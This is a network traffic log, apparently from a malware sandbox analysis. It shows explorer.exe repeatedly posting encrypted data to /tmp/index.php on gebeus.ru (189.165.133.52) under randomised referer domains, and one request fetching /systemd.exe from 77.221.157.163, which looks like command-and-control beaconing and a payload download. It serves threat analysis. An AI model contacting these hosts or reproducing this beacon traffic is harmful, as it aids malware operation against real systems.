Jul 24, 2024 19:55:49.286451101 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49720	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:49.295620918 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xnmfeyqpwnehurxh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: gebeus.ru
Jul 24, 2024 19:55:49.295650005 CEST	271	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2a 33 b1 ec Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu*3b3wjC~C%>ri\k%GMe+X!f^/I!9cj@K+WG&x\|@]#rzsS9
Jul 24, 2024 19:55:50.375511885 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49721	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:50.384366989 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eeycidiyfjvuwaep.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: gebeus.ru
Jul 24, 2024 19:55:50.384402990 CEST	311	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7d 2a ee f5 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu}*Utcvy@{P)--O81fz#u '?n&=n/a]h]9kl8.25(b@l#Pk} Fw
Jul 24, 2024 19:55:51.430130959 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49722	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:51.447033882 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmbakktwarjac.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: gebeus.ru
Jul 24, 2024 19:55:51.447058916 CEST	262	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 78 32 ea a0 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vux2UGd;HQN; k#yp)0="7_?Tkr>E$(/d0['v4*+Jv' (_x.NnO)gCjr,u
Jul 24, 2024 19:55:52.507863998 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49723	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:52.519596100 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://feltxgyoedldtlt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: gebeus.ru
Jul 24, 2024 19:55:52.519608974 CEST	117	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 56 2d b3 8b Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuV-Z$mf\|mtqQyooq
Jul 24, 2024 19:55:53.617111921 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49724	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:53.628927946 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtlgosscvcry.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: gebeus.ru
Jul 24, 2024 19:55:53.628963947 CEST	279	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 7d 3d ba fc Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu}=e\`=L3;%=l&h<3=#D%23q$%)9@2@'U+<H>+nQc~G}>s7L0g
Jul 24, 2024 19:55:54.697163105 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49725	77.221.157.163	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:54.707387924 CEST	163	OUT	GET /systemd.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.221.157.163

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49727	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:16.126836061 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkqgdawiidcayk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: gebeus.ru
Jul 24, 2024 19:56:16.126872063 CEST	114	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 20 32 d7 8b Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu 2&VJy/]Ot?+
Jul 24, 2024 19:56:17.278422117 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49728	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:17.290776968 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mmcxxioyukngeefd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: gebeus.ru
Jul 24, 2024 19:56:17.290802002 CEST	145	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 56 22 a6 95 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuV"azpqbiR\?!el2gZ\cPC[:L!C#
Jul 24, 2024 19:56:18.352253914 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:18 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49729	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:18.372742891 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://coiniqplnikp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: gebeus.ru
Jul 24, 2024 19:56:18.372772932 CEST	154	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 72 41 b7 82 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vurA<][lW9/%5ee^(}eDY5!Q3HkNA
Jul 24, 2024 19:56:19.420730114 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49730	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:19.439707041 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sijoltnxjfxqjw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: gebeus.ru
Jul 24, 2024 19:56:19.439729929 CEST	131	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 5b 49 b0 e7 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu[IL6[w`8*EsIUO?zd
Jul 24, 2024 19:56:20.746268988 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49731	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:20.757302999 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwqwnifeydwej.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 179 Host: gebeus.ru
Jul 24, 2024 19:56:20.757581949 CEST	179	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 6e 1d e4 89 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vunK;~}RR7ts2W\|~v^Da^vT??B'q{B.!55Vq]y
